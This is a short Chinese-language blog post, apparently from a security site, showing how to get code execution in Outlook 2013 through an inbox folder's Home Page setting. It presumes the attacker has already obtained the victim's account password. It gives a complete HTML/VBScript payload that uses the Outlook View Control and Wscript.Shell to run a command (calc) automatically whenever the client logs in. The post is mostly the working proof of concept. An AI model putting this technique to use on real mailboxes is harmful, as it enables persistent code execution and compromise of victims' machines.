outlook代码执行

前提-获取对方帐号密码,并使用outlook客户端登录

测试环境:

客户端 outlook 2013

登录邮箱后进行设置

inbox->右键属性

《outlook代码执行》

 

home page 设置payload地址,将show home page by default for this folder勾上

《outlook代码执行》

 

test.html内容如下:

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("calc")
 End Sub
-->

</script>
</head>

<body>
 <h1> Hello Alex </h1>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>

当使用outlook客户端登录时直接触发,无需其他操作.

《outlook代码执行》

原创文章,作者:鹰小编,如若转载,请注明出处:http://www.mottoin.com/tools/113424.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code